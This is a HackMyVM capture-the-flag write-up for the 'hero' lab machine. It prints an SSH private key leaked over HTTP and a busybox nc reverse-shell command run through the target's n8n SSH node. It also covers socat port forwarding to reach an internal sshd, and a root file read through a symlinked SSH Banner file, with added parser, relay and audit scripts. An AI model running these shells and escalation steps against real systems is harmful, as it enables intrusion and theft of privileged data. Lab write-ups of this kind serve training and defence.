
HMV-hero

HMV-hero machine writeup (HackMyVM)

Port scan

Note that this first scan was run against 192.168.179.180, which nmap identifies as an Android phone rather than the target; every command from the next section onwards targets 192.168.179.81, the machine actually being attacked.

┌──(root㉿kakeru)-[~/tmp]
└─# nmap -A 192.168.179.180
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-07 15:58 CST
Nmap scan report for 192.168.179.180 (192.168.179.180)
Host is up (0.0071s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain dnsmasq 2.51
| dns-nsid:
|_ bind.version: dnsmasq-2.51
8081/tcp filtered blackice-icecap
MAC Address: AE:01:4B:69:88:D3 (Unknown)
Device type: phone
Running: Google Android 10.X, Linux 4.X
OS CPE: cpe:/o:google:android:10 cpe:/o:linux:linux_kernel:4
OS details: Android 9 - 10 (Linux 4.9 - 4.14)
Network Distance: 1 hop

TRACEROUTE
HOP RTT ADDRESS
1 7.15 ms 192.168.179.180 (192.168.179.180)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.09 seconds

Information gathering

Requesting port 80 returns an SSH private key. Saving it to a file (here named tmp) and deriving the public key with ssh-keygen -y prints the key's comment field, shawa@hero, which gives both the username and the hostname. One check before using the file with ssh -i: chmod 600 it, because ssh refuses a private key that is readable by other users (ssh-keygen -y itself does not care).

┌──(root㉿kakeru)-[~/tmp]
└─# curl 192.168.179.81
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACComGN9cfmTL7x35hlgu2RO+QW3WwCmBLSF++ZOgi9uwgAAAJAczctSHM3L
UgAAAAtzc2gtZWQyNTUxOQAAACComGN9cfmTL7x35hlgu2RO+QW3WwCmBLSF++ZOgi9uwg
AAAEAnYotUqBFoopjEVz9Sa9viQ8AhNVTx0K19TC7YQyfwAqiYY31x+ZMvvHfmGWC7ZE75
BbdbAKYEtIX75k6CL27CAAAACnNoYXdhQGhlcm8BAgM=
-----END OPENSSH PRIVATE KEY-----
┌──(root㉿kakeru)-[~/tmp]
└─# ssh-keygen -y -f tmp
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKiYY31x+ZMvvHfmGWC7ZE75BbdbAKYEtIX75k6CL27C shawa@hero
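Where that username comes from, as an added example that is not part of the original writeup: an unencrypted openssh-key-v1 file stores the key comment in clear, next to a copy of the public key, so the same information ssh-keygen -y printed can be recovered by parsing the container format. The script below is a minimal parser for that format, written for this page in Python; its only input is the key from the curl output above, embedded verbatim. It refuses passphrase-protected or multi-key files, verifies the checkint pair and padding, and cross-checks the public key in the outer header against the copy inside the private section.

```python
import base64
import struct

# Constructed input: the private key served on port 80 of the target,
# copied verbatim from the curl output above.
PRIVATE_KEY_PEM = """-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACComGN9cfmTL7x35hlgu2RO+QW3WwCmBLSF++ZOgi9uwgAAAJAczctSHM3L
UgAAAAtzc2gtZWQyNTUxOQAAACComGN9cfmTL7x35hlgu2RO+QW3WwCmBLSF++ZOgi9uwg
AAAEAnYotUqBFoopjEVz9Sa9viQ8AhNVTx0K19TC7YQyfwAqiYY31x+ZMvvHfmGWC7ZE75
BbdbAKYEtIX75k6CL27CAAAACnNoYXdhQGhlcm8BAgM=
-----END OPENSSH PRIVATE KEY-----
"""

MAGIC = b"openssh-key-v1\x00"


class _Reader:
    """Sequential reader for the SSH wire format: big-endian uint32 length prefixes."""

    def __init__(self, data: bytes):
        self.data = data
        self.pos = 0

    def u32(self) -> int:
        if self.pos + 4 > len(self.data):
            raise ValueError("truncated uint32")
        (value,) = struct.unpack(">I", self.data[self.pos:self.pos + 4])
        self.pos += 4
        return value

    def string(self) -> bytes:
        length = self.u32()
        if self.pos + length > len(self.data):
            raise ValueError("truncated string")
        value = self.data[self.pos:self.pos + length]
        self.pos += length
        return value


def parse_openssh_private_key(pem: str) -> dict:
    """Parse an unencrypted openssh-key-v1 file and return type, comment and public key line.

    Raises ValueError for malformed, encrypted, or multi-key files."""
    lines = [line.strip() for line in pem.strip().splitlines()]
    if (lines[0] != "-----BEGIN OPENSSH PRIVATE KEY-----"
            or lines[-1] != "-----END OPENSSH PRIVATE KEY-----"):
        raise ValueError("not an OpenSSH private key")
    blob = base64.b64decode("".join(lines[1:-1]))
    if not blob.startswith(MAGIC):
        raise ValueError("missing openssh-key-v1 magic")

    outer = _Reader(blob[len(MAGIC):])
    cipher = outer.string().decode()
    kdf = outer.string().decode()
    outer.string()                       # kdfoptions, empty when unencrypted
    if outer.u32() != 1:
        raise ValueError("expected exactly one key")
    public_blob = outer.string()         # same bytes ssh-keygen -y base64-encodes
    private_section = outer.string()
    if cipher != "none" or kdf != "none":
        raise ValueError(f"key is passphrase-protected (cipher={cipher}, kdf={kdf})")

    inner = _Reader(private_section)
    check1, check2 = inner.u32(), inner.u32()
    if check1 != check2:                 # ssh uses this pair to detect a wrong passphrase
        raise ValueError("checkint mismatch")
    key_type = inner.string().decode()
    public_key = inner.string()
    private_key = inner.string()
    comment = inner.string().decode()    # "user@host" set at generation time
    padding = private_section[inner.pos:]
    if padding != bytes(range(1, len(padding) + 1)):
        raise ValueError("bad padding")

    # ed25519 private strings are seed || public key; both copies must agree.
    if key_type == "ssh-ed25519" and private_key[32:] != public_key:
        raise ValueError("public half inside private section does not match")
    pub = _Reader(public_blob)
    if pub.string().decode() != key_type or pub.string() != public_key:
        raise ValueError("outer public key does not match private section")

    return {
        "key_type": key_type,
        "encrypted": False,
        "comment": comment,
        "public_key_line": f"{key_type} {base64.b64encode(public_blob).decode()} {comment}",
    }


if __name__ == "__main__":
    print(parse_openssh_private_key(PRIVATE_KEY_PEM)["public_key_line"])
```

Run stand-alone it prints exactly the line ssh-keygen -y -f tmp produced above, comment included, which is why a leaked private key usually hands over a valid login name as well.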

Next is the part that held me up for a very, very long time:
I saw the experts using the SSH connection in https://github.com/n8n-io/n8n, and I was stuck on it for ages. Let me describe what went through my head:
Everyone was working on the machine together, and someone posted this n8n GitHub address and screenshots of the interface they were using. n8n is itself a tool, and the way to use it is to start it with docker, but I had never seen it before. This machine also had no port 22 open, so I assumed the experts were using this tool to deal with that situation. And when I ran the service on my own machine, the interface looked exactly the same.
It is used like this:

On the home page click Credentials, then Add, choose the SSH private key option, and enter the IP, username and private key.
Then the problem came: I could never connect. I saw the experts say to use 172.17.0.1, because the service runs in docker (which deepened my misunderstanding even further), but no matter what I tried I could not connect. I kept believing my configuration was wrong somewhere, so I searched the web endlessly for docker configuration. The error I got was that the port refused the connection; I went inside the docker container and found no SSH service running there either. I spent ages on this and searched docker topics for ages, and in the end I just could not get it to work: it simply would not connect. So I wondered whether I could find another way out myself.
That is when I discovered this:

┌──(root㉿kakeru)-[~/tmp]
└─# nmap -p- 192.168.179.81
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-07 21:31 CST
Nmap scan report for bogon (192.168.179.81)
Host is up (0.0017s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
5678/tcp open rrac
MAC Address: DE:86:60:02:F4:97 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 2.13 seconds


┌──(root㉿kakeru)-[~/tmp]
└─# nmap -A 192.168.179.81 -p 5678
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-07 21:32 CST
Nmap scan report for bogon (192.168.179.81)
Host is up (0.0034s latency).

PORT STATE SERVICE VERSION
5678/tcp open rrac?
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200 OK
| Accept-Ranges: bytes
| Cache-Control: public, max-age=86400
| Last-Modified: Fri, 07 Feb 2025 12:36:13 GMT
| ETag: W/"7b7-194e0691fac"
| Content-Type: text/html; charset=UTF-8
| Content-Length: 1975
| Vary: Accept-Encoding
| Date: Fri, 07 Feb 2025 13:32:19 GMT
| Connection: close
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <script type="module" crossorigin src="/assets/polyfills-DfOJfMlf.js"></script>
| <meta charset="utf-8" />
| <meta http-equiv="X-UA-Compatible" content="IE=edge" />
| <meta name="viewport" content="width=device-width,initial-scale=1.0" />
| <link rel="icon" href="/favicon.ico" />
| <style>@media (prefers-color-scheme: dark) { body { background-color: rgb(45, 46, 46) } }</style>
| <script type="text/javascript">
| window.BASE_PATH = '/';
| window.REST_ENDPOINT = 'rest';
| </script>
| <script src="/rest/sentry.js"></script>
| <script>!function(t,e){var o,n,
| HTTPOptions, RTSPRequest:
| HTTP/1.1 404 Not Found
| Content-Security-Policy: default-src 'none'
| X-Content-Type-Options: nosniff
| Content-Type: text/html; charset=utf-8
| Content-Length: 143
| Vary: Accept-Encoding
| Date: Fri, 07 Feb 2025 13:32:19 GMT
| Connection: close
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="utf-8">
| <title>Error</title>
| </head>
| <body>
| <pre>Cannot OPTIONS /</pre>
| </body>
|_ </html>
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port5678-TCP:V=7.95%I=7%D=2/7%Time=67A60B63%P=aarch64-unknown-linux-gnu
SF:%r(GetRequest,8DC,"HTTP/1\.1\x20200\x20OK\r\nAccept-Ranges:\x20bytes\r\
SF:nCache-Control:\x20public,\x20max-age=86400\r\nLast-Modified:\x20Fri,\x
SF:2007\x20Feb\x202025\x2012:36:13\x20GMT\r\nETag:\x20W/\"7b7-194e0691fac\
SF:"\r\nContent-Type:\x20text/html;\x20charset=UTF-8\r\nContent-Length:\x2
SF:01975\r\nVary:\x20Accept-Encoding\r\nDate:\x20Fri,\x2007\x20Feb\x202025
SF:\x2013:32:19\x20GMT\r\nConnection:\x20close\r\n\r\n<!DOCTYPE\x20html>\n
SF:<html\x20lang=\"en\">\n\t<head>\n\t\t<script\x20type=\"module\"\x20cros
SF:sorigin\x20src=\"/assets/polyfills-DfOJfMlf\.js\"></script>\n\n\t\t<met
SF:a\x20charset=\"utf-8\"\x20/>\n\t\t<meta\x20http-equiv=\"X-UA-Compatible
SF:\"\x20content=\"IE=edge\"\x20/>\n\t\t<meta\x20name=\"viewport\"\x20cont
SF:ent=\"width=device-width,initial-scale=1\.0\"\x20/>\n\t\t<link\x20rel=\
SF:"icon\"\x20href=\"/favicon\.ico\"\x20/>\n\t\t<style>@media\x20\(prefers
SF:-color-scheme:\x20dark\)\x20{\x20body\x20{\x20background-color:\x20rgb\
SF:(45,\x2046,\x2046\)\x20}\x20}</style>\n\t\t<script\x20type=\"text/javas
SF:cript\">\n\t\t\twindow\.BASE_PATH\x20=\x20'/';\n\t\t\twindow\.REST_ENDP
SF:OINT\x20=\x20'rest';\n\t\t</script>\n\t\t<script\x20src=\"/rest/sentry\
SF:.js\"></script>\n\t\t<script>!function\(t,e\){var\x20o,n,")%r(HTTPOptio
SF:ns,183,"HTTP/1\.1\x20404\x20Not\x20Found\r\nContent-Security-Policy:\x2
SF:0default-src\x20'none'\r\nX-Content-Type-Options:\x20nosniff\r\nContent
SF:-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x20143\r\nVary
SF::\x20Accept-Encoding\r\nDate:\x20Fri,\x2007\x20Feb\x202025\x2013:32:19\
SF:x20GMT\r\nConnection:\x20close\r\n\r\n<!DOCTYPE\x20html>\n<html\x20lang
SF:=\"en\">\n<head>\n<meta\x20charset=\"utf-8\">\n<title>Error</title>\n</
SF:head>\n<body>\n<pre>Cannot\x20OPTIONS\x20/</pre>\n</body>\n</html>\n")%
SF:r(RTSPRequest,183,"HTTP/1\.1\x20404\x20Not\x20Found\r\nContent-Security
SF:-Policy:\x20default-src\x20'none'\r\nX-Content-Type-Options:\x20nosniff
SF:\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x20
SF:143\r\nVary:\x20Accept-Encoding\r\nDate:\x20Fri,\x2007\x20Feb\x202025\x
SF:2013:32:19\x20GMT\r\nConnection:\x20close\r\n\r\n<!DOCTYPE\x20html>\n<h
SF:tml\x20lang=\"en\">\n<head>\n<meta\x20charset=\"utf-8\">\n<title>Error<
SF:/title>\n</head>\n<body>\n<pre>Cannot\x20OPTIONS\x20/</pre>\n</body>\n<
SF:/html>\n");
MAC Address: DE:86:60:02:F4:97 (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop

TRACEROUTE
HOP RTT ADDRESS
1 3.41 ms bogon (192.168.179.81)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.35 seconds

Whoa, I found there was a hidden port, and with an HTTP service on it. When I visited it, it turned out to be this n8n.
So it was never my n8n configuration that was wrong, because this is the target machine's n8n!!!!
I read the chat history and jumped to conclusions, and my own information gathering was incomplete. Lesson learned.

In the target's own n8n instance at http://192.168.179.81:5678, add an SSH credential with host 172.17.0.1, port 22, username shawa and the private key from port 80, and the connection succeeds. 172.17.0.1 is the host side of the Docker bridge: n8n runs in a container on the target, and, as the netstat output in the next section shows, sshd on the host listens only on that address, which is why it is invisible from the outside but reachable from the container.

Next, create a workflow and make the second node an SSH node set to execute a command.

Double-click the SSH node to enter the command to run.

A plain nc command does not work: the error message points us to busybox. busybox bundles a set of Linux utilities into one small binary, and on Alpine nc exists only as a busybox applet, so it has to be invoked as busybox nc.
The command to run is:

busybox nc 192.168.179.11 1234 -e /bin/sh

With a listener waiting on port 1234 of the attacking machine (192.168.179.11), this gives a reverse shell as shawa on the target, not a webshell: the SSH node runs the command on the host and nc connects back out.

Privilege escalation

The problem now is that this shell is unstable, so the next step is to get a stable one.
Following the group owner's method, socat is used to forward a port. The netstat output below shows sshd listening only on 172.17.0.1:22, the Docker bridge address, so it cannot be reached from the attacker's network. A socat binary is served from the attacking machine with python3 -m http.server, downloaded to /tmp on the target, and told to listen on 0.0.0.0:2222 and forward to 172.17.0.1:22, which exposes sshd on an ordinary interface.

┌──(root㉿kakeru)-[~/tmp]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

cd /tmp
wget 192.168.179.11/socat
ls -al
total 372
drwxrwxrwt 4 root root 100 Feb 7 14:56 .
drwxr-xr-x 21 root root 4096 Feb 6 10:03 ..
drwxrwxrwt 2 root root 40 Feb 7 12:35 .ICE-unix
drwxrwxrwt 2 root root 40 Feb 7 12:35 .X11-unix
-rw-r--r-- 1 shawa shawa 375176 Feb 7 14:56 socat
chmod +x socat
./socat TCP-LISTEN:2222,fork TCP4:172.17.0.1:22 &
busybox netstat -lntup
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 172.17.0.1:22 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:2222 0.0.0.0:* LISTEN 3105/socat
tcp 0 0 0.0.0.0:5678 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 :::5678 :::* LISTEN -
tcp 0 0 :::80 :::* LISTEN -
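The relay socat provides, as an added example rather than the author's command: the asyncio script below does what ./socat TCP-LISTEN:2222,fork TCP4:172.17.0.1:22 does (accept on one socket, dial the target, copy bytes in both directions, and half-close the far side on EOF so a reply still in flight is not lost). It is Python, which this Alpine box would not have, so it is here to make the mechanism explicit, not as a replacement for the uploaded binary; the listen and target addresses, and the relay_roundtrip self-test that talks to a local echo server instead of sshd, are constructed for the example.

```python
import asyncio


async def _pump(reader: asyncio.StreamReader, writer: asyncio.StreamWriter) -> None:
    """Copy bytes one way until EOF, then half-close the far side.

    Half-closing (shutdown(SHUT_WR)) instead of closing is what lets the other
    direction finish: the reply to the last bytes may still be on its way."""
    try:
        while chunk := await reader.read(65536):
            writer.write(chunk)
            await writer.drain()
    except ConnectionError:
        return
    try:
        if writer.can_write_eof():
            writer.write_eof()
    except OSError:
        pass


async def _handle_client(client_r, client_w, target_host: str, target_port: int) -> None:
    """One accepted connection: dial the target, pump both directions, then close both."""
    try:
        target_r, target_w = await asyncio.open_connection(target_host, target_port)
    except OSError:
        client_w.close()          # target unreachable: drop the client, as socat would
        return
    try:
        await asyncio.gather(_pump(client_r, target_w), _pump(target_r, client_w))
    finally:
        client_w.close()
        target_w.close()


async def start_relay(listen_host: str, listen_port: int,
                      target_host: str, target_port: int):
    """Equivalent of: socat TCP-LISTEN:<listen_port>,fork TCP4:<target_host>:<target_port>"""
    return await asyncio.start_server(
        lambda r, w: _handle_client(r, w, target_host, target_port),
        listen_host, listen_port)


async def _roundtrip(payload: bytes) -> bytes:
    """Offline self-test: relay to a local echo server and return what comes back."""
    async def echo(r, w):          # stands in for sshd on 172.17.0.1:22
        w.write(await r.read())    # read until the relay half-closes this side
        await w.drain()
        w.close()

    echo_srv = await asyncio.start_server(echo, "127.0.0.1", 0)
    echo_port = echo_srv.sockets[0].getsockname()[1]
    relay = await start_relay("127.0.0.1", 0, "127.0.0.1", echo_port)
    relay_port = relay.sockets[0].getsockname()[1]
    try:
        r, w = await asyncio.open_connection("127.0.0.1", relay_port)
        w.write(payload)
        w.write_eof()              # like a client that has finished sending
        reply = await r.read()     # until the relay half-closes our side
        w.close()
    finally:
        relay.close()
        echo_srv.close()
    return reply


def relay_roundtrip(payload: bytes) -> bytes:
    """Send payload through a fresh relay to a fresh echo server; returns the echoed bytes."""
    return asyncio.run(_roundtrip(payload))


if __name__ == "__main__":
    # On the box this would be: asyncio.run(serve forever on 0.0.0.0:2222 -> 172.17.0.1:22)
    print(relay_roundtrip(b"SSH-2.0-probe\r\n"))
```

On the target the equivalent long-running call is start_relay("0.0.0.0", 2222, "172.17.0.1", 22) followed by serve_forever(); the self-test exists so the relay logic can be exercised without an sshd. The half-close detail matters for SSH specifically, because the server's final packets after a client-side EOF would otherwise be dropped.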

Now ssh through the forwarded port with the private key gives a stable shell:

┌──(root㉿kakeru)-[~/tmp]
└─# ssh shawa@192.168.179.81 -i tmp -p 2222
The authenticity of host '[192.168.179.81]:2222 ([192.168.179.81]:2222)' can't be established.
ED25519 key fingerprint is SHA256:EBZrmf2l6+BtffXHAEtSx6Suq5Wf09yzZlVqbQaGOVM.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.179.81]:2222' (ED25519) to the list of known hosts.
shawa was here.
Welcome to Alpine!

The Alpine Wiki contains a large amount of how-to guides and general
information about administrating Alpine systems.
See <https://wiki.alpinelinux.org/>.

You can setup the system with the command: setup-alpine

You may change this message by editing /etc/motd.

hero:~$

Neither sudo nor SUID binaries offer anything usable: sudo is not installed, and /bin/bbsuid is Alpine's standard setuid wrapper for the few busybox applets that need root, so it is expected on any Alpine system.

hero:~$ sudo -l
-sh: sudo: not found
hero:~$ find / -user root -perm -4000 -print 2>/dev/null
/bin/bbsuid
hero:~$

A hint from the group: the privilege escalation goes through the SSH banner. sshd's privileged process reads the Banner file as root before authentication and sends its contents to every client that connects, so if shawa can replace that file, anything root can read can be leaked through the banner. The banner location is in the sshd configuration file (/etc/ssh/sshd_config):

# no default banner path
Banner /opt/banner.txt

Make a symlink: /opt is writable by shawa, so delete banner.txt and replace it with a link to /root/root.txt:

hero:/etc/ssh$ cd /opt
hero:/opt$ ls
banner.txt containerd
hero:/opt$ rm banner.txt
hero:/opt$ ln -s /root/root.txt banner.txt
hero:/opt$

Connect again with ssh and the flag is printed as the banner, before the MOTD:

┌──(root㉿kakeru)-[~/tmp]
└─# ssh shawa@192.168.179.81 -i tmp -p 2222
HMVNOTINPRODLOL
Welcome to Alpine!

The Alpine Wiki contains a large amount of how-to guides and general
information about administrating Alpine systems.
See <https://wiki.alpinelinux.org/>.

You can setup the system with the command: setup-alpine

You may change this message by editing /etc/motd.

hero:~$
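A check for the misconfiguration the escalation relied on, added here and not part of the original writeup: the script parses sshd_config for the Banner directive and reports whether the banner file is a symlink or sits where a non-root user can replace it. demo_findings() rebuilds the box's layout (Banner /opt/banner.txt pointing at /root/root.txt) inside a temporary directory, so it runs without touching the real /etc/ssh; the temporary paths and the file contents it writes are constructed for the example.

```python
import os
import stat
import tempfile

WRITABLE_BITS = stat.S_IWGRP | stat.S_IWOTH


def banner_path(sshd_config: str):
    """Return the effective Banner path from sshd_config text, or None.

    sshd keeps the first occurrence of a keyword; comments and blank lines are
    skipped, keywords are case-insensitive, 'Key=value' is accepted, and the
    value 'none' disables the banner. Match-block scoping is not modelled."""
    for raw in sshd_config.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        head = line.split(None, 1)
        if "=" in head[0]:
            head = line.split("=", 1)
        if len(head) == 2 and head[0].strip().lower() == "banner":
            value = head[1].strip().strip('"')
            return None if value.lower() == "none" else value
    return None


def audit_banner(sshd_config: str, root: str = "/") -> list:
    """Findings for the banner file; `root` lets the check run against a copied filesystem.

    The banner is read by sshd's root process before authentication and sent to
    every client, so a symlink or a replaceable file becomes a root file read."""
    path = banner_path(sshd_config)
    if path is None:
        return []
    full = os.path.join(root, path.lstrip("/"))
    findings = []
    try:
        st = os.lstat(full)                  # lstat: look at the link itself
    except FileNotFoundError:
        return [f"missing: {path} does not exist"]
    if stat.S_ISLNK(st.st_mode):
        findings.append(f"symlink: {path} -> {os.readlink(full)}")
    elif st.st_uid != 0 or st.st_mode & WRITABLE_BITS:
        findings.append(f"writable_file: {path} can be rewritten by a non-root user")
    parent_dir = os.path.dirname(full)
    parent = os.stat(parent_dir)
    sticky = bool(parent.st_mode & stat.S_ISVTX)
    if parent.st_uid != 0 or (parent.st_mode & WRITABLE_BITS and not sticky):
        findings.append(f"writable_dir: {os.path.dirname(path)} lets a non-root user "
                        f"replace {os.path.basename(path)}")
    return findings


def demo_findings() -> dict:
    """Constructed scenario: the box's layout before and after the symlink is removed."""
    config = "# no default banner path\nBanner /opt/banner.txt\n"
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "opt"))
        os.makedirs(os.path.join(root, "root"))
        flag = os.path.join(root, "root", "root.txt")
        with open(flag, "w") as fh:
            fh.write("constructed root flag\n")
        banner = os.path.join(root, "opt", "banner.txt")
        os.symlink(flag, banner)             # what `ln -s /root/root.txt banner.txt` did
        symlinked = audit_banner(config, root)
        os.unlink(banner)
        with open(banner, "w") as fh:        # a regular banner file in the same place
            fh.write("shawa was here.\n")
        regular = audit_banner(config, root)
    return {"symlinked": symlinked, "regular": regular}


if __name__ == "__main__":
    for case, findings in demo_findings().items():
        print(case, findings or ["ok"])
```

The "regular" case still reports the directory when it is owned by a non-root user, which is the real defect on this box: the fix is a root-owned /opt (or a banner under /etc) with mode 0755 and a root-owned 0644 banner file, not just deleting the link.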